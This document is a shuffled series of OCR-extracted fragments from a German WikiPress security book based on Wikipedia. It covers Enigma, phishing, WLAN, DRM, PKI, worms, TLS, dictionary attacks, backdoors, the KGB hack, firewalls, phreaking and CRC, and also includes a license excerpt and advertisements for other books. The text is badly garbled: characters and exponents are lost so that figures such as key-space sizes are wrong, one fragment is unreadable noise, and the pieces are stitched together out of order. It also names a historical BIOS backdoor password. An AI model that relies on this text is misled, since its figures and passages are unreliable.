136. D BDCA CABD CBAD CBDA DACB DBAC DBCA brig bleiben nur die folgenden neun fixpunktfreien Permutationen BADC BCDA BDAC CADB CDAB CDBA DABC DCAB DCBA Beriicksichtigt man jetzt noch dass die Umkehrwalze nicht nur alle Permu tationen mit Fixpunkten eliminiert sondern auch alle nichtinvolutorischen Permutationen so miissen aus der obigen Tabelle noch weitere sechs Falle ge strichen werden Ubrig bleiben von allen m glichen 24 Permutationen eines Alphabets aus vier Buchstaben lediglich die drei fixpunktfreien und involuto rischen F lle Sie werden als echt involutorische Permutationen bezeichnet BADC CDAB DCBA Bei der Enigma mit ihren 26 Buchstaben bewirkt diese Beschr nkung dass statt der 26 also ungef hr 4033 10 insgesamt m glichen permu tierten Alphabete lediglich die etwa 4250 10 fixpunktfreien echt in volutorischen Alphabete genutzt werden Durch die Umkehrwalze ver schenkt man also etwa den Faktor 10 eine Billionen an M glichkeiten Kryptografisch noch katastrophaler als diese drastische Reduktion des Schl sselraums ist jedoch dass durch die Vermeidung von Fixpunkten Aussagen ber den Text m glich sind wie Nichts ist jemals es selbst die bei der Entzifferung eine ganz wesentliche Hilfe waren Wei der An 306 Enigma greifer dass niemals ein Buchstabe die V
137. Download Center Her Nutzeranlertung Vorname Kontakt Name Sicherheit Tasten Sie in das Basisinformationen f r gegebene Feld 10 Verm gensanlagen ungenutzte TAN Filiale Konto stellig 7 stellig PIN 5 stellig E mail Abb 21 Phishing Webseite 238 WLAN Wireless LAN Wireless LAN Wireless Local fy Area Network WLAN kabelloses g lokales Netzwerk bezeichnet ein drahtloses lokales Funknetz MoMa Notebook wobei meistens ein Standard der IEEE 802 11 Familie gemeint ist Teen outer p cose Das K rzel Wi Fi wird oft falsch 2 ss lich mit WLAN gleichgesetzt EX Router PC Im Gegensatz zum Wireless D Personal Area Network WPAN rer haben WLANs gr ere Sendeleis Abb 22 Typisches Wireless LAN im tungen und Reichweiten und bieten Pr vathaushalt im Allgemeinen h here Daten bertragungsraten WLANs stellen Anpas sungen der Schicht 1 und 2 des OSI Referenzmodells dar wohingegen in WPANs z B ber eine im Protokoll vorgesehene Emulation der seriellen Schnittstelle und PPP bzw SLIP eine Netzverbindung aufgebaut wird Betriebsart Ein WLAN kann auf zwei Arten Modi betrieben werden im Infra struktur Modus oder im Ad hoc Modus Access Point N Zelle2 Zelle 3 Ss Zelle 1 u _ Abb 23 Zelltopologie 239 WLAN Im Infrastruktur Modus wird eine Basisstation h ufig ein Wireless Ac cess Point speziell ausgezeichnet Er koordiniert die
138. Ds mit ei nem Kopierschutz womit diese nicht mehr dem Red Book Standard ent sprechen der eine einfache Form eines DRM Systems darstellt Bei Inhalten die bereits als Computerdatei vorliegen ist das Kopieren noch einfacher Hier entf llt die Umwandlung in ein anderes Format z B von einer CD in mp3 Dateien der Benutzer kann die Datei einfach per E Mail verschicken oder in Tauschb rsen verbreiten Bei kommerziellen Downloadangeboten greifen die Anbieter deshalb meist auf komplexere DRM Systeme zur ck damit die gekauften Dateien vom K ufer nicht kostenlos weiter verteilt werden Anwendungen Digital Rights Management wird derzeit haupts chlich bei digitalen Me dien wie Filmen und Musik eingesetzt Am weitesten verbreitet sind die DRMS Windows Media DRM von Microsoft und iTunes von Apple Beide erm glichen eine genaue Einstellung der Berechtigungen und k nnen f r verschiedene Audio und Videodateien verwendet werden Die meisten Onlineshops wie Napster und Musicload aber auch Video on Demand Dienste von T Online und Arcor verwenden vornehmlich das DRM Sys tem von Microsoft F r Musik existieren weitere Verfahren etwa das in iTunes verwendete FairPlay von Apple f r AAC Dateien sowie Ans tze von RealAudio Helix In Zukunft werden DRMS aber auch in vielen an deren Bereichen wie im Automobilbereich Softwareschutz Online Na vigation oder im Embedded Bereich eine gro e Rolle spielen Technische Umsetzung DRM Systeme
139. ES Skank deSen SS Rel4 9 MLSs a oer RIK Eo Ce leridase4i Gis enok O bso Oar Olse Oslo rh OMIerioi ina Ul enal Mole she SG ewer Clow Ils DOs Gye it BeNeR EES 52a ori 2er JERAR Sr Ebr lee sere BOSisils RreclechlLeW TE 20s os sesse ORR ails MALTA 31013 BOIRCLAB Cla SEAS SrelR Ge as WE Bick slog ete a GAR EO Rlones f3s8e Klasse 3 Zertifikate beinhalten neben der Uberpriifung der E Mail Adresse eine pers nliche Identit tspr fung der Person Die Person wird dabei anhand eines g ltigen Ausweises oder Passes identifiziert und es wird sichergestellt dass im Zertifikat enthal tene Angaben zur Person mit den Angaben im Ausweis berein stimmen Wurde die Registrierung abgeschlossen erzeugt die Key Authori ty KA ein Schl sselpaar bestehend aus privatem und ffentlichem Schl ssel Theoretisch ist es auch m glich dass der Benutzer bereits ein Schl sselpaar erzeugt hat und um die Zertifizierung seines ffent lichen Schl ssels bittet Das Zertifikat wird ausgestellt indem die vertrauensw rdige Zertifi zierungsstelle den ffentlichen Schl ssel des Benutzers digital signiert Damit best tigt sie dass der Benutzer tats chlich Eigent mer des dazu passenden privaten Schl ssels ist 145 PGP und Zertfikate Das Schl sselpaar wird an den Benutzer ausgeliefert z B auf einer Chipkarte per Post und das Zertifikat ver ffentlicht Bedeutung des Status der Zertifizierungsstellen Zertifizierungsstellen k nnen
140. Fahndung nach den Verursachern unterst t zen Microsoft arbeitet mit Interpol dem FBI dem Secret Service und dem Internet Fraud Complaint Center zusammen denn boshafte W rmer und Viren sind kriminelle Attacken auf jedermann der das Internet benutzt Derzeit sind die Autoren der W rmer W32 Blaster Sasser Netsky und Sobig auf der Wanted Liste Im Mai 2004 hatte dieses Programm seinen ersten Erfolg als der Wurmautor von Sasser und Netsky verhaftet und verurteilt wurde Der zu diesem Zeitpunkt 18 j hrige Sch ler aus Waffen sen im Kreis Rotenburg W mme wurde von seinen Freunden wegen der ausgesetzten Belohnung verraten Geschichte Anf nge Das Konzept eines Computerwurms oder Netzwerkwurms wurde schon 1975 im Science Fiction Buch The Shockwave Rider dt Der 59 Viren W rmer Trojaner Schockwellenreiter von John Brunner erw hnt Aber erst im Jahr 1988 wurde von Robert Morris der erste wirkliche Computerwurm program miert Der so genannte Morris Wurm verbreitete sich unter Ausnutzung von einigen Unix Diensten wie z B Sendmail Finger oder Rexec sowie der r Protokolle Zwar hatte der Wurm keine direkte Schadensroutine trotzdem legte er wegen seiner aggressiven Weiterverbreitung ca 6 000 Rechner lahm das entsprach zu dieser Zeit ungef hr 10 des weltweiten Netzes Die Entwicklung von Computerw rmern blieb bis Mitte der 1990er Jahre beinahe stehen Grund daf r war dass das Internet noch nicht die Ausdehnung hat
141. Holke Immanuel Giel Stefan h Robb VanGore Achim Raschka FlaBot Raymond Gmoeller Ranthoron Schnargel Paelzeur JochenF Johnny drossel DerSchim Phoenix2 FabianLange Morken anonym 12 1 06 1 2 06 WikiPress Redaktion Transport Layer Security Transport Layer Security TLS oder Secure Sockets Layer SSL ist ein Verschl sselungsprotokoll f r Daten bertragungen im Internet TLS 1 0 und 1 1 sind die standardisierten Weiterentwicklungen von SSL 3 0 Hier wird die Abk rzung SSL f r beide Bezeichnungen verwendet Geschichte November 1993 erstes Release von Mosaic 1 0 vom National Center for Supercomputing Applications NCSA Mosaic war der erste verbreite te Webbrowser Nur neun Monate sp ter ver ffentlichte Netscape Communications die erste Version von SSL 1 0 318 Transport Layer Security F nf Monate sp ter wurde schon der n chste Release SSL 2 0 ver ffent licht dieser deckte sich auch gerade mit der neuen Version des Netsca pe Navigator Ende 1995 kam Microsoft mit der ersten Version seines Browsers In ternet Explorer heraus Kurz darauf wurde auch die erste Version ihres SSL Pendants bekannt PCT 1 0 Private Communication Technology PCT hatte einige Vorteile gegen ber SSL 2 0 und diese wurden dann auch in SSL 3 0 aufgenommen Als SSL von der IETF im RFC 2246 als Standard festgelegt wurde be nannte man es im Januar 1999 um zu Transport Layer Security TLS Die Unterschiede zwischen SSL 3 0 un
142. Ihr letztes Cross Site Scripting 222 Verschl sselung 281 Sachbuch hat Sie weitergebracht Die Chancen daf r stehen gut denn wir KGB Hack 224 Entschl sselung 285 haben im deutschen Sprachraum eine breit gef cherte und nach hohen Man In The Middle Kennwort 286 Qualit tsma st ben arbeitende Verlagslandschaft Aber Moment mal Ist Angriff 2 20 20 0 227 RC4 0202020 20 290 jeder geschriebene Satz in dem Buch wahr Lesen Sie nicht mitunter Be Social Engineering 228 Brute Force Methode 291 hauptungen denen Sie weniger zustimmen k nnen Gibt es berhaupt ein Phishing 230 Worterbuchangriff 293 Sachgebiet in dem sich alle Experten stets einig sind Nein Dann m sste Enigma 295 es doch zum selben Thema auch ebenso gut gemachte Biicher geben die WLAN 2 2 239 Transport Layer Security 318 zu manch einem Aspekt glatt die entgegengesetzte Auffassung vertreten Wireless LAN 239 Und tats chlich Es gibt sie nahezu zu jedem Thema Wired Equivalent Privacy 247 Anhang 323 Was bedeutet dies f r Sie Es bleibt Ihnen nichts anderes brig als je Wi Fi Protected Access 251 Gesamtautorenliste 323 des Buch kritisch zu lesen Und in diesem Buch laden wir Sie dazu gleich IEEE 802 1li 253 GNU Free Documentation zu Beginn ausdr cklich und herzlich ein Temporal Key Integrity License 327 Dieses Buch hat keine Autorin und keinen
143. Im Benutzerhandbuch des Betriebs systems findet man auch Beispielkonfigurationen f r den hostbasierten Einsatz der Paketfilteralternativen IPFilter ipf und pf Benutzer die Konfigurationswerkzeuge mit grafischer Bedienoberfl che bevorzugen finden einige wenige Programme in den Ports Die Qt Firewall qtfw ist ein Frontend f r die IPFirewall Anwendungsbasiertes Filtern ist mit den unter FreeBSD zur Verf gung stehenden Paketfiltern nicht m glich Mac OSX enth lt ebenfalls den Paketfilter IPFirewall ipfw Bekannte grafische Frontends f r diesen Paketfilter unter OS X sind die Sharewa re Programme BrickHouse von Brian Hill und Firewalk der Firma Pliris LLC Seit Mac OS X 10 2 Jaguar ist ein grafisches Frontend f r ipfw im Betriebssystem enthalten Das kommerzielle Programm Little Snitch hat sich auf das anwendungsbasierte Filtern ausgehender Verbindungen spe zialisiert jene Funktion die ipfw nicht bietet Little Snitch kann interak tiv ber Dialogfenster konfiguriert werden Diese Fenster erscheinen und informieren den Benutzer wenn eine Anwendung eine Verbindung ins Internet herstellt Der in Linux enthaltene Paketfilter netfilter beherrscht anwendungsba siertes Filtern Als grafisches Frontend f r netfilter gibt es Programme wie KMyFirewall und Guarddog f r KDE und Firestarter f r den GNOME Desktop Firestarter ist bersichtlich und einfach zu bedienen erlaubt aber dennoch umfangreiche Einstellm glichkeiten wie das Filt
144. Instanz berpr ft Das richtige Passwort f hrt aufgrund des verwendeten Verschl sselungsver fahrens direkt zur Entschl sselung des Textes Der Angreifer kann hier erheblich mehr Passw rter in k rzerer Zeit ausprobieren Die Geschwin digkeit h ngt von der vom Angreifer verwendeten Soft und Hardware ab Schon auf handels blichen Computern k nnen ohne weiteres mehrere hunderttausend Passw rter pro Sekunde durchprobiert werden Stand 2005 Gut ausger stete Angreifer k nnen mehrere Millionen Passw rter pro Sekunde berpr fen Der aktive Wortschatz einer Sprache liegt in der Regel bei 50 000 W r tern Somit k nnen dutzende Sprachen innerhalb weniger Sekunden ber pr ft werden Ein Passwort welches nur aus ein oder zwei Worten besteht ist daher bei der Verschl sselung von Texten sehr unsicher Verfahren Durch ein spezielles Programm werden die Eintr ge der Passwortliste als Benutzername oder Passwort durchprobiert M glich ist auch das Ver wenden von zwei getrennten Listen f r Benutzername und Passwort Viel h ufiger ist jedoch die Verwendung einer Combo List einer kombinierten Liste aus Benutzername und Passwort des Formats Benutzername Pass wort Vorteile Besonders die typischen Passw rter sind mit dieser Methode leicht zu knacken Auch die Dauer der Ausf hrung die blicherweise geringer ist als beispielsweise die der Brute Force Methode spricht f r die Verwen dung dieser Methode Nachteile Bei dieser
145. Jahren in den amerikanischen Ghettos entstandene Subkultur des Hip Hop hat sich l ngst zum Mas senph nomen entwickelt Ihre Symbole und Ausdrucksformen sind zu selbstverst ndlichen Alltagserscheinungen geworden Die Szene ha ihre Top Stars zu Million ren gemacht doch nach wie vor erfindet sich der Hip Hop st ndig neu Produktionen mit rein kommerziellem Kal k l stehen aktuelle innovative Entwicklungen gegen ber Dieses Buch verfolgt die aufregende Geschichte des Hip Hop sowie die Entwicklung einzelner K nstler Hip Hop Kultur Musik Geschichte WikiPress 3 ISBN 3 86640 003 9 9 90 a WIKI Aus der freien Enzyklop die Wikipedia LS PRESS zusammengestellt von Andreas Martin Selignow DTP professionell Grundlagen Anwendungen Ergebnisse pwi Aus dex freien Eruyklop che Wikipedia PRESS sar jestellt von Dirk Franke Hip Hop Kultur Musik Geschichte Antarktis Bereits lange vor der Entdeckung der Antarktis im Jahre 1820 gab es Theorien ber einen unbekann ten und geheimnisvollen S dkontinent namens Terra australis wo paradiesische Zust nde herrschen sollten Mit der Erforschung wurde diese Vorstellung jedoch durch eine eisige und unwirtliche Realit t ersetzt die sich lebensfeind licher und unbequemer als alle bislang bekannten Regionen der Welt pr sentierte Das Buch berich tet ber diesen Lebensraum seine Bewohner und die Menschen die sich der Herausforderung Antark
146. Kubieziel Zwobot Steven Malkovich Poldi Tsor Christoph D E7 Pemu Head Herzl J mach wust Guillermo Thomas G Graf Kleopatra Mps Sparti anonym 12 1 06 1 2 06 WikiPress Redaktion Backdoor Als Backdoor engl f r Hintert r auch trapdoor Fallt r bezeich net man einen vom Autor eingebauten Teil eines Computerprogrammes der es Benutzern erm glicht unter Umgehung der normalen Zugriffs sicherung Zugang zu einem Computer oder Computerprogramm zu erlangen Eine Variante besteht darin in einem System fest vorgegebene nur dem Ersteller des Systems bekannte Passw rter oder andere versteckte Funk tionen die ein Login ohne die sonst bliche Authentifizierung erm gli chen einzubauen Bekanntestes Beispiel hierf r ist wohl das von Award Software ber mehrere Jahre vergebene BIOS Universalpasswort lkwpe ter Publikumswirksam demonstriert wurde der Einsatz einer Hintert r auch im Kinofilm Jurassic Park Als ein Vorteil quelloffener Software wird deshalb von der Open Sour ce Bewegung oft angef hrt dass der Quelltext eines potenziell sch d lichen Programms nach derartigen Hintert ren leicht von jedem selbst durchsucht werden k nnte Im Gegensatz dazu seien propriet re Anwen dungen nicht f r jedermann einsehbar In j ngerer Zeit findet der Begriff Backdoor auch Anwendung als Bezeich nung f r z B durch Trojaner nachtr glich installierte Programmpakete 168 Hoax die Benutzern ber das
147. M rz 1989 wird nach monatelanger Beschattung durch die Po lizei und den Bundesnachrichtendienst in einer bundesweiten Aktion die 225 Angriffe KGB Hack Gruppe zerschlagen Im ARD Brennpunkt am gleichen Abend wird daraus der gr te Spionagefall seit Guillaume Am 15 Februar 1990 werden die am KGB Hack beteiligten DOB Pedro und Urmel zu Frei heitsstrafen auf Bew hrung zwischen 14 Monaten und 2 Jahren verurteilt Obwohl ihm Straffreiheit zugesichert wurde zog Karl Koch so wird vermutet den Freitod durch Selbstverbrennung vor Die tats chlichen Umst nde seines Todes wurden nie restlos gekl rt es wird aber vermutet dass Koch dem psychischen Druck bei den monatelangen Vernehmungen in Verbindung mit den Wirkungen seiner Drogenabh ngigkeit und des geistigen Verfalls nicht standgehalten hat Auch wenn ein Mord an Koch nicht bewiesen werden konnte so konnte er auch nicht zweifelsfrei ausge schlossen werden Technischer Hintergrund Beiihren Einbr chen nutzten die KGB Hacker h ufig eine Sicherheitsl cke im Programm Movemail aus Einzige Aufgabe dieser kleinen Emacs Kom ponente war hereinkommende Mail aus dem Verzeichnis var spool mail in das Home Verzeichnis des jeweiligen Empf ngers zu verschieben 1986 war das Programm so modifiziert worden dass es auch Mails ber das Protokoll POP3 abholen konnte Dazu war es notwendig geworden mo vemail mit SUID root also den Rechten des lokalen Administrators lau fen zu
148. Methode ist man sehr auf eine gute Passwortliste angewiesen Da naturgem selbst die beste Liste nicht alle m glichen Passw rter ent h lt kann mit dieser Methode auch nicht jedes Passwort geknackt werden Besonders klein ist die Chance Passw rter die aus sinnlosen Zeichenrei hen bestehen zu knacken 294 Enigma Gegenma nahmen Die effektivste Gegenma nahme ist die Benutzer zur Verwendung von Sonderzeichen in ihren Passw rtern zu zwingen Allerdings steigt dabei das Risiko dass sie sich die Passw rter aufschreiben Zus tzlich sollte versucht werden den Angreifer auszubremsen so dass er m glichst lange braucht um viele Passw rter durchzuprobieren In der Re gel wird dazu nach der Eingabe eines falschen Passworts eine Warteschleife eingebaut Hier muss der Programmierer allerdings darauf achten dass der Angreifer nicht mehrere Anmeldeversuche parallel unternehmen kann Die Passw rter der Benutzer sollten serverseitig nicht im Klartext ge speicherten werden In der Regel wird lediglich der Hash des Passworts gespeichert Wenn es einem Angreifer gelingt in den Besitz dieser Datei zu gelangen kann er mit den Passw rtern zun chst nichts anfangen Er muss das oben bei passiven Angriffsobjekten beschriebene Verfahren an wenden Er nimmt sich ein W rterbuch hasht die einzelnen W rter und vergleicht das Ergebnis mit dem verschl sselten Passwort Damit da f r keine fertigen Listen mit Hash Wert gt Originalwort b
149. Nach au en gerichtete Ver bindungen kontrolliert die Windows Firewall nicht In Standardkonfiguration enth lt die Windows Firewall einen sicher heitskritischen Fehler dieser wurde mit der Korrektur vom 14 Dezember 2004 beseitigt Ihr Vorg nger die Internet Connection Firewall ICF ist ein reiner Pa ketfilter In den Grundeinstellungen von Windows XP ist die ICF nicht aktiviert ZoneAlarm Von ZoneAlarm gibt es eine f r Privatanwender kostenlose Version und die kommerzielle Version ZoneAlarm Pro die einen gr e ren Funktionsumfang bietet Der Name kommt daher dass die Personal Firewall getrennte Sicherheitseinstellungen f r zwei verschiedene Zonen eine f r das lokale Netz und eine f r das Internet erlaubt Der Schwer punkt des Produkts liegt auf einfacher Installation und Konfiguration Der Hersteller der Desktop Firewall die Firma Zone Labs wurde 1997 gegr ndet Anfang 2004 wurde sie f r um die 205 Millionen Dollar von der Firma Check Point einem bekannten Hersteller von Firewall und VPN Produkten aufgekauft Sunbelt Kerio Personal Firewall Die Sunbelt Kerio Personal Firewall SKPF l uft auf Windows XP und Windows 2000 Professional Die Be triebssysteme Windows 98 und ME werden seit Version 4 2 nicht mehr unterst tzt Die Desktop Firewall kann nach Registrierung mit Name und E Mail Adresse bei der Firma Sunbelt heruntergeladen werden Nach der Installation erh lt man zun chst eine Vollversion die 30 Tage get
150. Netzwerk auf Grund Abb 15 Verfassen einer E Mail in Mozilla Mail des Benutzerverhaltens Dies ber raschte die ARPANET Initiatoren denn noch 1967 hatte Lawrence Ro berts der sp tere Leiter von IPTO gesagt die M glichkeit des Austausches von Botschaften unter den Netzwerkteilnehmern sei not an important motivation for a network of scientific computers dt kein wichtiger Be weggrund ein Netzwerk wissenschaftlicher Rechner aufzubauen Bereits 1971 berstieg das Gesamtvolumen des elektronischen Mailverkehrs das Datenvolumen das ber Telnet und FTP abgewickelt wurde Als Erfinder der elektronischen Post gilt der Computertechniker Ray Tomlinson Erste Tests erfolgten 1971 und gegen Ende 1971 November oder Dezember hatten die von ihm entwickelten Programme SNDMSG READMAIL Premiere Der damals beim privaten Forschungsunterneh men BBN Bolt Beranek and Newman in Cambridge Massachusetts mit dem Aufbau des ARPANET besch ftigte Erfinder kann aber nach eige nen Angaben nicht mehr genau sagen was der Inhalt der ersten Botschaft war Die erste Buchstabenreihe einer amerikanischen Computertastatur QWERTYUIOP sei aber sehr wahrscheinlich Parallel zum Internet entwickelten sich Beginn der 1980er Jahre in den meisten Netzwerken Systeme mit denen sich Nachrichten bertragen lie en Dazu geh rten unter anderem Mailbox Systeme X 25 Novell und BTX Diese Systeme wurden Mitte der 1990er durch die Verbreitung des Internet s
151. Nummern heute 0800 Man lie sich mit bersee Gegenstellen verbinden und schickte erstnach Verbindung ber den Satelliten die bekannten BlueBox T ne ber die Leitung Gegen 1991 1992 nahm das kostenlose Telefonieren in der Masse wohl auch verst rkt durch die illegalen Computer Szenen auf dem Commodore Amiga und C64 ber Blue Boxes derartig zu dass Gegenma nahmen getroffen wurden Am Anfang kam es zu kleinen nderungen der Frequenzreihenfolge l nge In Deutschland war zu dieser Zeit die Verwendung von BlueBoxes durch den stetig steigenden Aufbau des digitalen Netzes jedoch bereits sehr gef hrlich und dadurch un interessanter geworden Durch die digitale Technik war ein Aufsp ren Tra cing des benutzenden Anschlusses in Sekundenschnelle m glich Erste Versionen von Telefonkarten bzw der Kartentelefone lie en sich ebenfalls manipulieren um kostenlos zu telefonieren ebenso wie es heute Softwareprogramme gibt um Calling Card Nummern zu generieren Phreaking wurde oft zum Zwecke des Hackens bzw Crackens be trieben also dem Eindringen in fremde Computer In diesem Zusammen hang dienten diese technischen Schaltungen auch dazu die R ckverfol gung solcher illegalen Aktivit ten zu erschweren Aquabox Als Van Eck Phreaking bezeichnet man eine Form der elektronischen Spionage Die von elektrischen Ger ten z B Computermonitoren abge strahlten elektromagnetischen Wellen werden ber gr ere Entfernungen hinweg aufgefan
152. Personal Firewall Soft ware zu verwenden bzw zu aktivieren wenn sie im Lieferumfang des Be triebssystems enthalten ist aktuelle Linux Distributionen Windows XP Service Pack 2 Diese kann wenn sie richtig konfiguriert ist Anfragen ber das Netzwerk an laufende Server Anwendungen ausfiltern und somit das Ausnutzen von auch noch unbekannten Sicherheitsl cken verhindern 57 Viren W rmer Trojaner Sinnvoll ist diese Ma nahme vor allem wenn es nicht m glich ist die Server Anwendung zu beenden oder so zu konfigurieren dass Anfragen nicht mehr angenommen werden wenn die Gefahr besteht dass eine Ser ver Anwendung ungewollt gestartet wird Allerdings k nnen diese Per sonal Firewalls selbst Sicherheitsl cken enthalten durch die Angreifer in ein System eindringen k nnen Paketfilter Die meisten Personal Firewalls haben auch einen Paketfilter integriert Ein Paketfilter ist eine Anwendung die Netzwerkkommunika tion nach bestimmten technischen Kriterien filtern kann Diese Kriterien kann man durch die Konfiguration des Paketfilters festlegen Um sich vor Angriffen auf Server Anwendungen zu sch tzen kann man einen solchen Paketfilter einsetzen indem man Anfragen an diese Server Anwendung ausfiltert wenn Gr nde dagegen sprechen die Server Anwendung zu be enden oder die Gefahr besteht dass eine Server Anwendung ungewollt gestartet wird Rechtetrennung des Betriebssystems Ausgereifte Betriebssysteme Mac OS Linux Windo
153. Phishing leitet sich vom Fischen engl fishing nach pers nlichen Daten ab Die Ersetzung des F durch Ph stellt eine Imi tation des Begriffes Phreaking dar der sich in den 1970er Jahren durch eine Zusammenziehung von Phone und Freak ergab Phishing Angriffsziele sind Zugangsdaten z B f r Banken Online banking Versandh user Internet Auktionsh user webbasierende On lineberatungen oder Kontaktportale Mit den gestohlenen Zugangsdaten kann der Phisher die Identit t seines Opfers bernehmen Identity Theft und in dessen Namen Handlungen ausf hren Durch den Missbrauch der pers nlichen Daten entstehen betr chtliche Sch den in Form von Ver m genssch den z B berweisung von Geldbetr gen fremder Konten Rufsch digung z B Versteigerung gestohlener Waren unter fremdem Namen bei Online Auktionen oder Sch den durch Aufwendungen f r Aufkl rung und Wiedergutmachung ber die H he der Sch den gibt es nur Sch tzungen die zwischen mehreren hundert Millionen Dollar und Milliardenbetr gen schwanken Stand Februar 2005 Eine weiter entwickelte Form des klassischen Phishing ist das Phar ming Methoden der Datenbeschaffung Im Allgemeinen beginnt eine Phishing Attacke mit einer pers nlich ge haltenen offiziell anmutenden E Mail oder einem Massenversand von E Mails Der Empf nger soll eine betr gerische Website besuchen die t uschend echt aussieht und unter einem Vorwand zur Eingabe seiner Zugangsdaten
154. Programm bedienen zu k nnen Die F higkeit im Problemfall zu improvisieren be sitzt es demnach nicht In der Fachwelt wird daher deutlich zwischen ei nem Cracker als destruktiven Sicherheitsexperten und einem diesbez g lich unkundigen Skriptkiddie unterschieden Der Ursprung des Begriffs Cracker liegt in der englischen Umgangs sprache bzw dem Slang und bezeichnet hier das Aufbrechen von etwas oder das Zer Brechen der Wirkung eines Sicherheitssystems oder einer Sperrvorrichtung Der umstrittene Wandel des Begriffs Cracker In den 1980ern galten Hacker als wissbegierige Menschen welche die Welt der Computer erforsch ten dabei in die Tiefen der Materie eindrangen und sich dadurch auch in fremde Systeme hacken konnten egal ob mit b swilliger Absicht oder nicht das ist oftmals ohnehin eine Frage des Standpunktes Cracker waren all jene die Generatoren f r Lizenznummern erstellten oder Programme ver nderten um z B den Kopierschutz zu umgehen Allerdings sind die Er mittlung eines g ltigen Freischaltcodes und das Knacken von Passw rtern sinnbildlich nicht sehr weit voneinander entfernt So ist das Cracken von Passw rtern der einzige Punkt in dem sich damals die handwerkliche Spur von Hackern und Crackern kreuzte Dabei ist zu beachten dass der heutige Common Sense der Hacker Community welche dem Hackerhandwerk das Cracken von Passworten abspricht seinerzeit noch nicht existierte Demge gen ber geh ren heutzutage
155. Schl s sel einzeln in seinem Public Keyring selbst fest zur Wahl stehen die Werte unknown f r Benutzer ber die man keine weiteren Informationen hat not trusted f r Benutzer denen nicht vertraut wird vor der Signie rung anderer Schl ssel ist eine ordentliche Pr fung der Authentizit t durchzuf hren marginal f r Benutzer denen nicht voll vertraut wird complete f r Benutzer denen voll vertraut wird ultimate f r Benutzer deren Private Key sich im Private Keyring be findet 138 Web of Trust Signatory Trust Signiert Alice den Public Key von Bob und bertr gt diese Signatur anschlie end an einen Keyserver so kann diese Signatur von Carl zur Beurteilung der Authentizit t des ffentlichen Schl ssels von Bob benutzt werden Dazu berpr ft Carl ob er den ffentlichen Schl ssel von Alice selbst signiert hat und ihn ihr als Owner Trust marginal oder complete zugeordnet hat Ist das der Fall so erh lt Alices Signatur ge nau diesen Wert Hat Carl den Schl ssel von Bob selbst signiert so erh lt diese Signatur ebenfalls den Signatory Trust complete in allen anderen Fallen wird der Signatur der Wert not trusted zugeordnet Im Gegensatz zum Owner Trust geh rt der Signatory Trust also zu einer Signatur und nicht zu einer Person Key Legitimacy Das Vertrauen in die Authentizit t eines ffentlichen Schl ssels wird durch den Key Legitimacy Wert ausgedr ckt Er wird aus dem Signator
156. Such a notice grants a world wide royalty free license unlimited in duration to use that work under the conditions stated herein The Document below refers to any such manual or work Any member of the public is a licensee and is addressed as you You accept the license if you copy modify or distribute the work in a way requiring permission under copyright law A Modified Version of the Document means any work containing the Document or a portion of it either copied verbatim or with modifications and or translated into another language A Secondary Section is a named appendix or a front matter section of the Document that deals exclusively with the relationship of the publishers or authors of the Document to the Document s overall subject or to related matters and contains nothing that could fall directly within that overall subject Thus if the Document is in part a textbook of mathematics a Secondary Section may not explain any mathematics The relationship could be a matter of historical connection with the subject or with related matters or of legal commercial philosophical ethical or political position regarding them The Invariant Sections are certain Secondary Sections whose titles are designated as being those of Invariant Sections in the notice that says that the Document is released under this License If a section does not fit the above definition of Secondary then it is not allowed to be designated as Invariant
157. Termen z B x x 1 aber nicht z B x 1 W hlt man das CRC Polynom so dass es x 1 als Faktor hat werden alle Fehler mit einer ungeraden Anzahl von verf lschten Bits erkannt Beweis Bei der Division durch ein Polynom mit gerader Parit t Anzahl der Terme in dem Polynom also Anzahl der Einsen in der Bitfolge bleibt die Geradheit oder Ungeradheit der Parit t des Divisors erhalten denn aus 00 wird 11 und umgekehrt und aus 01 wird 10 und umgekehrt x 1 ist das kleinste Polynom mit gerader Parit t Bei E x G x wird also stehts x oder 1 als Rest bleiben wenn E x ungerade Parit t hat Damit ist E x nicht durch G x teilbar Alle B ndelfehler der Lange k lt r wobei r der Grad des CRC Polynoms ist werden erkannt Ein B ndelfehler der Lange k l sst sich schreiben als xi xk 1 1 x b x wobei i bestimmt wieviele Bitpositionen von der rechten Seite der empfangenen Bitfolge bzw des empfangenen Rah mens der Biindelfehler entfernt ist Wenn der Fehler erkannt werden soll muss die Division von E x x b x durch G x einen Rest ergeben Wenn G x einen x Term enth lt so hat G x sicher nicht als Faktor x D h wenn G x x b x dann muss G x b x Dies ist jedoch nicht m glich da per Annahme der Grad von b x kleiner ist deg b x k 1 als der Grad von G x Der Rest kann niemals 0 sein und der Biindelfehler wird erkannt 264 Zyklische Redundanzpr fung Berechnung einer CRC 3
158. Theorie in die Praxis umge setzt Zwei Spieler lie en Software Organismen um die Kontrolle ber das System k mpfen Die Programme versuchten dabei einander zu berschreiben Sp tere Versionen des Spiels wurden als Core Wars be kannt 1975 ver ffentlichte der englische Autor John Brunner den Roman Der Schockwellenreiter in dem er die Gefahr von Internetviren vorausahnt Sein Kollege Thomas J Ryan schilderte 1979 in The Adolescence of P 1 wie sich eine k nstliche Intelligenz viren hnlich ber das nationale Com puternetz ausbreitet Im Jahr 1980 verfasste J rgen Kraus an der Universit t Dortmund eine Diplomarbeit mit dem Titel Selbstreproduktion bei Programmen in welcher der Vergleich angestellt wurde dass sich bestimmte Pro gramme hnlich wie biologische Viren verhalten k nnen Die Beh rden wurden bei dieser Diplomarbeit hellh rig und lie en die Verbreitung des Werkes stoppen Aus diesem Grund ist die Arbeit heute nicht mehr erh ltlich 1982 wurde von Rich Skrenta ein Computerprogramm geschrieben das sich selbst ber Disketten auf Apple II Systemen verbreitete Das Pro gramm hie Elk Cloner und kann als das erste Bootsektorvirus bezeich net werden Die Grenze von Theorie und Praxis bei Computerviren ver schwimmt jedoch und selbst Experten streiten sich was tats chlich das erste war Professor Leonard M Adleman verwendete 1984 im Gespr ch mit Fred Cohen zum ersten Mal den Begriff Computervirus 40 Co
